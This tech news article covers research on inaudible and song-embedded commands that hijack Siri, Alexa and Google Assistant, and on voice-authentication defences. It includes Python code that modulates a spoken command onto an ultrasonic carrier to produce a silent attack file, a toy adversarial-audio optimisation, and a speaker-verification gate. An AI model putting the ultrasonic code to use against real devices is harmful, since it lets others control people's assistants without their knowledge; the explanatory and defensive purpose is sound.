Researchers show Siri and Alexa can be exploited with silent commands hidden in songs

Researchers at UC Berkeley have shown they can embed stealthy commands for popular voice assistants inside songs, prompting platforms like Siri, Alexa or Google Assistant to carry out actions without humans getting wise.

The research, reported earlier by The New York Times, is a more actionable evolution of something security researchers have been showing great interest in: fooling voice assistants like Siri.

Last year, researchers at Princeton University and China’s Zhejiang University demonstrated that voice-recognition systems could be activated using frequencies inaudible to the human ear. The attack first muted the phone so the owner wouldn’t hear the system’s responses, either.

The technique, which the Chinese researchers called DolphinAttack, can instruct smart devices to visit malicious websites, initiate phone calls, take a picture or send text messages. While DolphinAttack has its limitations (the transmitter must be close to the receiving device), experts warned that more powerful ultrasonic systems were possible.
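
The core trick, as the DolphinAttack authors describe it, is to amplitude-modulate an ordinary voice command onto an ultrasonic carrier; nonlinearity in the target device’s microphone hardware demodulates it back into the audible band the recognizer expects. Here is a minimal sketch of that modulation step in Python. The carrier frequency, sample rate and file names are illustrative assumptions, not values from the research, and the input is assumed to be a mono recording:

```python
import numpy as np
from scipy.io import wavfile

CARRIER_HZ = 30_000    # illustrative ultrasonic carrier; real attacks tune this per device
SAMPLE_RATE = 96_000   # output rate high enough to represent the ultrasonic carrier

# Load an ordinary, audible voice command (hypothetical file name, assumed mono).
rate, voice = wavfile.read("ok_google_command.wav")
voice = voice.astype(np.float64)
voice /= np.max(np.abs(voice))            # normalize to [-1, 1]

# Upsample to the higher rate with simple linear interpolation.
t_old = np.arange(len(voice)) / rate
t_new = np.arange(0.0, t_old[-1], 1.0 / SAMPLE_RATE)
baseband = np.interp(t_new, t_old, voice)

# Amplitude-modulate the command onto the ultrasonic carrier: the carrier and its
# sidebands sit above ~20 kHz, so humans hear nothing, but a nonlinear microphone
# response can recover the original baseband command.
carrier = np.cos(2 * np.pi * CARRIER_HZ * t_new)
ultrasonic = (1.0 + baseband) * carrier

wavfile.write("ultrasonic_command.wav", SAMPLE_RATE, np.int16(ultrasonic / 2 * 32767))
```

Played through a speaker capable of ultrasonic output, the result is silent to anyone nearby, which is also why the attack’s main constraint is the distance between transmitter and device.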

That warning was borne out in April, when researchers at the University of Illinois at Urbana-Champaign demonstrated ultrasound attacks from 25 feet away. While the commands couldn’t penetrate walls, they could control smart devices through open windows from outside a building.

The research out of Berkeley can hide commands to make calls or visit specific websites inside audio, without human listeners being able to discern them. The modifications add some digital noise, but nothing that sounds like English.
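
Judging from published work on adversarial audio, the underlying idea is to treat the song as the starting point of an optimization: nudge its samples, within a tight loudness budget, until the speech recognizer’s output matches the attacker’s phrase while a human still hears only music. The sketch below uses a toy linear “model” purely to show the shape of that optimization; the model, sample rate and budget are all stand-in assumptions, not the actual attack:

```python
import numpy as np

rng = np.random.default_rng(0)

# Toy stand-in for a speech-to-text model: a linear scorer over one second of 16 kHz audio.
w = rng.normal(size=16_000)                 # "model" weights
song = rng.normal(scale=0.3, size=16_000)   # stand-in for a clip of music

def target_score(x: np.ndarray) -> float:
    """Higher score = the toy model is closer to 'hearing' the attacker's phrase."""
    return float(w @ x)

# Gradient ascent on a perturbation delta, kept tiny with an l-infinity bound so the
# modified audio still sounds like the original song to a human listener.
epsilon = 0.002      # maximum per-sample change, far below the music's own amplitude
step = 1e-4
delta = np.zeros_like(song)

for _ in range(200):
    grad = w                                           # d(score)/d(input) for a linear model
    delta = np.clip(delta + step * np.sign(grad), -epsilon, epsilon)

adversarial = song + delta
distortion_db = 20 * np.log10(np.max(np.abs(delta)) / np.max(np.abs(song)))
print(target_score(song), target_score(adversarial), f"{distortion_db:.1f} dB")
```

The real attack swaps the toy scorer for the loss of a full neural speech-to-text model and keeps the perturbation tens of decibels below the original signal, which is why listeners notice only faint noise on top of the music.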

These exploits are still in their infancy, as are the security capabilities of the voice assistants. As smart assistants gain abilities that make it easier for users to send emails, messages and money with their voice, things like this are a bit worrisome.

One takeaway is that digital assistant makers may have to get more serious about voice authentication so they can determine with greater accuracy whether the owner of a device is the one voicing commands, and if not, lock down the digital assistant’s capabilities. Amazon’s Alexa and Google Assistant both offer optional features that lock down personal information to a specific user on the basis of their voice pattern; meanwhile, most sensitive info on iOS devices requires the device to be unlocked before it can be accessed.
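
One common way to implement that kind of lock-down is speaker verification: compare an embedding of the incoming voice against the enrolled owner’s embedding and allow sensitive actions only above a similarity threshold. The following is a minimal sketch of the policy layer; the embeddings, threshold and action names are hypothetical, not any vendor’s actual implementation:

```python
import numpy as np

SIMILARITY_THRESHOLD = 0.85   # illustrative; real systems tune this against false accepts/rejects
SENSITIVE_ACTIONS = {"send_money", "send_email", "read_messages"}

def cosine_similarity(a: np.ndarray, b: np.ndarray) -> float:
    return float(a @ b / (np.linalg.norm(a) * np.linalg.norm(b)))

def handle_command(action: str, speaker_embedding: np.ndarray, owner_embedding: np.ndarray) -> str:
    """Let routine commands through, but gate sensitive ones on who is speaking.

    The embeddings are assumed to come from a separate speaker-recognition model
    (not shown here); this only illustrates the policy decision.
    """
    if action not in SENSITIVE_ACTIONS:
        return f"ok: {action}"
    if cosine_similarity(speaker_embedding, owner_embedding) < SIMILARITY_THRESHOLD:
        return f"locked: {action} requires the enrolled owner's voice"
    return f"ok: {action}"

# Usage: a hidden command asking to send money would fail the voice check.
owner = np.random.default_rng(1).normal(size=128)
attacker = np.random.default_rng(2).normal(size=128)
print(handle_command("play_music", attacker, owner))   # ok
print(handle_command("send_money", attacker, owner))   # locked
print(handle_command("send_money", owner, owner))      # ok
```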

The potential here is nevertheless frightening and something that should be addressed early on, and publicly. As we saw from some of Google’s demos of its Duplex software at I/O this week, the company’s ambitions for its voice assistant are growing rapidly, and as the company begins to release Smart Display devices with its partners that integrate cameras, the possibilities for abuse are widening.
